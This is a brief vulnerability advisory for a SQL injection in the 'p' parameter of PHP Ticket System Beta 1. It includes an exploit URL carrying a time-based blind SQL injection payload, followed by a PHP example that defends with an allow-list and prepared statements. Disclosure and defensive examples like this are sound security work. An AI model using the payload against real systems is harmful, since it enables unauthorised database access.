Title: PHP Ticket System Beta 1 'p' SQL Injection
Author: G13 www.2cto.com
Download URL: http://sourceforge.net/projects/phpticketsystem/
Affected version: Beta 1

Description
PHP Ticket System is a small PHP MySQL trouble ticket or work order system that is a work in progress.

Vulnerability
The 'p' parameter on index.php is vulnerable to SQL Injection. A user must be signed in to perform this attack.

Test method
http://www.2cto.com/index.php?p=[SQLi]&id=211&_=1334627588812

Exploit
http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812

Fix: Upgrade to the latest version.
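A sketch of how the 'p' value can be handled safely, added here as an example and not taken from PHP Ticket System's code. It assumes 'p' selects a page by name; the `pages` table, its columns, the allow-list entries and both function names are hypothetical, and SQLite stands in for MySQL so the block runs offline.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list of page names accepted in the 'p' parameter.
const ALLOWED_PAGES = ['home', 'edit_ticket', 'view_ticket'];

/** Return the page name if it is on the allow-list, otherwise null. */
function resolvePage(string $p): ?string
{
    return in_array($p, ALLOWED_PAGES, true) ? $p : null;
}

/** Look up a page row with a bound parameter instead of string interpolation. */
function findPage(PDO $db, string $p): ?array
{
    $stmt = $db->prepare('SELECT name, template FROM pages WHERE name = :name');
    $stmt->execute([':name' => $p]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database (assumed schema).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pages (name TEXT PRIMARY KEY, template TEXT)');
$db->exec("INSERT INTO pages VALUES ('edit_ticket', 'edit_ticket.tpl')");

$inputs = [
    'edit_ticket',                                  // normal request
    "edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg",   // 'p' value from the advisory
];

foreach ($inputs as $p) {
    $allowed = resolvePage($p) !== null;
    // Even without the allow-list, the bound value is compared as plain data,
    // so the quote characters cannot change the structure of the query.
    $row = findPage($db, $p);
    printf(
        "%-45s allow-list=%s row=%s\n",
        $p,
        $allowed ? 'yes' : 'no',
        $row !== null ? $row['template'] : 'none'
    );
}
```

With the MySQL PDO driver, setting `PDO::ATTR_EMULATE_PREPARES` to `false` makes the statement a server-side prepare.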